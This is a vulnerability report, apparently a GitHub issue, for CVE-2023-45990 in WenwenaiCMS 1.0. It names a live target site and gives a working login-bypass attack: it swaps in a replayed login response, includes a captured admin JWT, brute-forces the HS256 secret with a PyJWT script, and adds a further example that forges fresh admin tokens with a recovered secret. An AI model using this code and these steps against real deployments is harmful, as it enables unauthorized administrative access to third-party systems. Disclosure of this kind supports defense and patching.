
CVE-2023-45990: WenwenAiCms Vulnerability Testing · Issue #2 · PwnCYN/Wenwenai

Insecure Permissions vulnerability in WenwenaiCMS v.1.0 allows a remote attacker to escalate privileges.

Tags: CVE, vulnerability, js, nginx

Product Name:
Wenwenai CMS

Affect version:
1.0

Case addresses:
Demo: https://chat.wenwen-ai.com/
Target: https://laoluoai.com/

Vulnerability Type:
Logic flaw (login bypass via replayed/forged JWT)

Description:

Discover the backend login page by directory scanning. The login page links to the developer's demo site; log in there with the account and password the demo site provides, intercept the traffic, and save the response to the login request.

The successful login response shows that the site authenticates with a JWT, returned in the data field, and the token header (eyJhbGciOiJIUzI1NiIs...) gives the algorithm as HS256. Because HS256 is a symmetric HMAC, the signing secret can be recovered offline by brute-forcing the captured token against a wordlist; an expired token is still usable for this, since only the signature is compared.

On a target that runs the same CMS, logging in with an unknown account and password returns a 400 error. Intercept that response and replace it with the successful login response (including the JWT): the front end treats the login as successful and loads the backend. This swap only convinces the client; the backend will honour subsequent requests only if it accepts the token, i.e. if it verifies it with the same secret, which is why recovering the signing secret and minting tokens with it matters for reliable access.

Brute force (PyJWT; reads candidate secrets from topred.txt, one per line):

import jwt  # PyJWT
import termcolor

if __name__ == "__main__":
    # Token taken from the successful login response of the demo site
    jwt_str = R'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjIsImVtYWlsIjoiYWRtaW5AYWRtaW4uY29tIiwicm9sZSI6ImFkbWluIiwib3BlbklkIjoiIiwiaWF0IjoxNjk2OTM1MjIwLCJleHAiOjE2OTc1NDAwMjB9.4bAkWmA5tc0y3IZylKivqY-Bim-GN84EdNNkUur97ic'
    with open('topred.txt') as f:
        for line in f:
            key_ = line.strip()
            try:
                # PyJWT 2.x dropped the old verify= flag and requires the allowed
                # algorithms to be listed explicitly. The signature is checked
                # before any claim, so a wrong key always ends in InvalidSignatureError.
                jwt.decode(jwt_str, key=key_, algorithms=['HS256'])
                print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
                break
            except (jwt.exceptions.ExpiredSignatureError, jwt.exceptions.InvalidAudienceError,
                    jwt.exceptions.InvalidIssuedAtError, jwt.exceptions.ImmatureSignatureError):
                # Signature verified but a claim failed (the captured token is expired):
                # the key is still the right one
                print('\r', '\bbingo! found key -->', termcolor.colored(key_, 'green'), '<--')
                break
            except jwt.exceptions.InvalidSignatureError:
                print('\r', ' ' * 64, '\r\btry', key_, end='', flush=True)
                continue
        else:
            print('\r', '\bsorry! no key was found!')
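The brute force above and the follow-on forgery that the description relies on, written out with only the Python standard library so it runs offline and shows exactly what is being compared. This is an added example, not the reporter's script and not code from the CMS. The token is the one from the login response on this page; the weak secret "wenwenai", the short wordlist and the fixed timestamps used in demo() are constructed for the example, and the real secret of that token is not known here.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Token copied from the login response on this page. Header and payload are only
# base64url-encoded, so the claims are readable without knowing the secret.
PAGE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjIsImVtYWlsIjoiYWRtaW5AYWRtaW4uY29tIiwicm9sZSI6ImFkbWluIiwib3BlbklkIjoiIiwiaWF0IjoxNjk2OTM1MjIwLCJleHAiOjE2OTc1NDAwMjB9."
    "4bAkWmA5tc0y3IZylKivqY-Bim-GN84EdNNkUur97ic"
)


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    # JWT segments drop the '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256_sign(header: dict, payload: dict, secret: str) -> str:
    """Build an HS256 JWT: HMAC-SHA256 over base64url(header).base64url(payload)."""
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def decode_unverified(token: str) -> dict:
    """Read header and claims without checking the signature (the attacker's first look)."""
    h, p, _ = token.split(".")
    return {"header": json.loads(b64url_decode(h)), "payload": json.loads(b64url_decode(p))}


def hs256_verify(token: str, secret: str, now: Optional[int] = None) -> Optional[dict]:
    """Server-side check: return the claims if signature and exp hold, else None."""
    h, p, s = token.split(".")
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    claims = json.loads(b64url_decode(p))
    now = int(time.time()) if now is None else now
    if "exp" in claims and claims["exp"] <= now:
        return None
    return claims


def recover_secret(token: str, wordlist) -> Optional[str]:
    """Offline brute force: re-sign with each candidate and compare to the token's MAC.
    Only the signature is compared, so an expired captured token still leaks the key."""
    h, p, s = token.split(".")
    target = b64url_decode(s)
    for candidate in wordlist:
        candidate = candidate.strip()
        mac = hmac.new(candidate.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(mac, target):
            return candidate
    return None


def forge_admin_token(secret: str, template_claims: dict, lifetime: int = 7 * 24 * 3600,
                      now: Optional[int] = None) -> str:
    """Mint a fresh token with the recovered secret, keeping the claim layout the CMS issued."""
    now = int(time.time()) if now is None else now
    claims = dict(template_claims, iat=now, exp=now + lifetime)
    return hs256_sign({"alg": "HS256", "typ": "JWT"}, claims, secret)


def demo():
    # Constructed for the offline run: a weak secret and a tiny candidate list.
    weak_secret = "wenwenai"
    wordlist = ["123456", "admin", "secret", "jwt_secret", "wenwenai", "changeme"]
    claims = decode_unverified(PAGE_TOKEN)["payload"]          # real claim layout from the page
    issued = hs256_sign({"alg": "HS256", "typ": "JWT"}, claims, weak_secret)
    found = recover_secret(issued, wordlist)                    # -> "wenwenai"
    forged = forge_admin_token(found, claims, now=1700000000)   # new iat/exp, role still "admin"
    return found, hs256_verify(forged, weak_secret, now=1700000001)


if __name__ == "__main__":
    print(decode_unverified(PAGE_TOKEN))
    print(demo())
```

recover_secret is the same comparison PyJWT performs inside jwt.decode, minus the claim checks; for a real wordlist run against the page's token, hashcat mode 16500 (JWT) does the same work far faster. The payload of the page's token decodes to username admin, id 2, role admin, iat 1696935220 and exp 1697540020 (a 7-day lifetime), which is the claim set forge_admin_token reuses.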

PoC (successful login response captured from the demo site; the JWT is returned in the data field):

HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Tue, 10 Oct 2023 10:53:40 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 295
Connection: close
X-Powered-By: Express
Access-Control-Allow-Origin: *
ETag: W/"127-ZwpaZ2UCZyA1cCA/eHV9Dl6CgjI"
Vary: Accept-Encoding

{"code":200,"data":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWQiOjIsImVtYWlsIjoiYWRtaW5AYWRtaW4uY29tIiwicm9sZSI6ImFkbWluIiwib3BlbklkIjoiIiwiaWF0IjoxNjk2OTM1MjIwLCJleHAiOjE2OTc1NDAwMjB9.4bAkWmA5tc0y3IZylKivqY-Bim-GN84EdNNkUur97ic","success":true,"message":"请求成功"}
